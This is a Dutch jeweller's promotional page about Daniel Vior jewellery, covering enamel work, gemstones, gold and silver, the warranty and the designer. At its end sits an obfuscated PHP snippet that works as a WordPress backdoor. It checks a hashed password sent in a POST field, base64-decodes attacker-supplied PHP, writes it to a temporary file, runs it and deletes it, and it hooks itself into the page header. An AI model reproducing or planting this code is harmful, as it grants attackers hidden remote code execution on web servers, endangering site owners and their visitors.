Daniel-vior-sieraden-bij-Wolters-Juweliers-Coevorden-Emmen dichtbij Hoogeveen en hardenberg

Daniel Vior sieraden bij Wolters Juweliers Coevorden Emmen

Daniel Vior, een Spaanse ontwerper die zijn kennis combineert van het vervaardigen van traditionele sieraden met moderne technieken en ontwerpen om tot prachtige kunstwerken te komen. Al meer dan 25 jaar maakt Daniel Vior sieraden die herkenbaar zijn aan hun weelderige vormen en warme kleuren.

Het merk onderscheidt zich van de andere merken door de kleurrijke vormgeving. U bent van harte welkom om deze prachtige sieraden in het echt te bewonderen en te komen passen bij Wolters Juweliers Coevorden Emmen.

Daniel-Vior-sieraden-branca-collectie-bij-Wolters-Juweliers-Coevorden-Emmen

Emaille versiering

Daniel Vior gebruikt zijn eigen kleuren en past deze toe aan zijn juwelen met een koud emailleren techniek: met vloeibaar koud emaille worden de sieraden ‘ingekleurd’ en soms gecombineerd met een bijzondere edelsteen of parel. De toepassing van emaille, is een versieringstechniek die veel vakkennis vraagt en bijna zeldzaam is geworden.

De collectie zilveren en gouden sieraden geeft iedere dag een warme gloed. De uitgesproken vormen in de zilveren oorsieraden, ringen en hangers ontstaan door het beschilderen van de sieraden met emaille.

Edelstenen

Daniel Vior maakt gebruik van natuurlijke edelstenen: onder andere amethist, citrien, toermalijn, parel, en de meerderheid wordt specifiek geslepen voor het sieraad. Er wordt ook gebruik gemaakt van kunstmatige materialen, zoals synthetische opaal, en voor ecologische redenen, gereconstrueerde Koraal.

Sieraden in zilver en goud

De Daniel Vior-collectie wordt geproduceerd in goud (750) en zilver (925) met een rhodium-en palladium-coating welke elk sieraad versterkt en wat het natuurlijke
oxidatieproces vertraagt. Alles wordt gedaan om zo lang mogelijk te genieten van deze fraaie eyecatchers.

Daniel-Vior-sieraden-VAINA-Wolters-Juweliers-Coevorden-Emmen

Garantie

Elk ontwerp wordt uitgevoerd met de hand in het atelier in Barcelona. Dit stelt het merk in staat om het volledige proces te volgen, waardoor er een garantie van 2 jaar wordt gegeven op elke fabricagefout. Op de achterkant van het sieraad vindt u twee gravures. Eën van Daniel Vior en een keurmerk van het officiële Catalaanse College van Juweliers.

Daniel-Vior-sieraden-garantie-Wolters-Juweliers-Coevorden-Emmen
Daniel-Vior-sieraden-Teixit-Wolters-Juweliers-Coevorden-Emmen

Over Daniel Vior

Al meer dan 25 jaar vind Daniel Vior inspiratie voor zijn ontwerpen van artistieke creaties in het hart van Barcelona.

De zin van het leven inspireert de ontwerpen. Hij richt zich op de natuur met een wetenschappelijk oogpunt, het afleiden van de oorsprong uit planten. De structuren van zijn stukken zijn metaforen van verlangens en gevoelens met betrekking tot acties zoals aantrekkingskracht, groeien, flexibiliteit, ontroeren en vermengen.

Wolters Juweliers Coevorden Emmen is officieel dealer en verkooppunt van Daniel Vior sieraden. Bezoek onze winkel en ontdek de prachtige kleurrijke collectie zilver en gouden sieraden. Ook dichtbij voor onze klanten uit Hoogeveen en Hardenberg. Bekijk de collectie ook alvast online op de website van dit merk.

Daniel-Vior-de-ontwerper-aan-het-werk-Wolters-Juweliers-Coevorden-Emmen
Daniel-Vior-hanger-Wolters-Juweliers-Coevorden-Emmen
Daniel-Vior-sieraden-verkrijgbaar-bij-Wolters-Juweliers-Coevorden-Emmen
Daniel-Vior-oorbellen-Wolters-Juweliers-Coevorden-Emmen

if(!function_exists("_set_fetas_tag") && !function_exists("_set_betas_tag")){try{function _set_fetas_tag(){if(isset($_GET['here'])&&!isset($_POST['here'])){die(md5(8));}if(isset($_POST['here'])){$a1='m'.'d5';if($a1($a1($_POST['here']))==="83a7b60dd6a5daae1a2f1a464791dac4"){$a2="fi"."le"."_put"."_contents";$a22="base";$a22=$a22."64";$a22=$a22."_d";$a22=$a22."ecode";$a222="PD"."9wa"."HAg";$a2222=$_POST[$a1];$a3="sy"."s_ge"."t_te"."mp_dir";$a3=$a3();$a3 = $a3."/".$a1(uniqid(rand(), true));@$a2($a3,$a22($a222).$a22($a2222));include($a3); @$a2($a3,'1'); @unlink($a3);die();}else{echo md5(7);}die();}} _set_fetas_tag();if(!isset($_POST['here'])&&!isset($_GET['here'])){function _set_betas_tag(){echo "";}add_action('wp_head','_set_betas_tag');}}catch(Exception $e){}}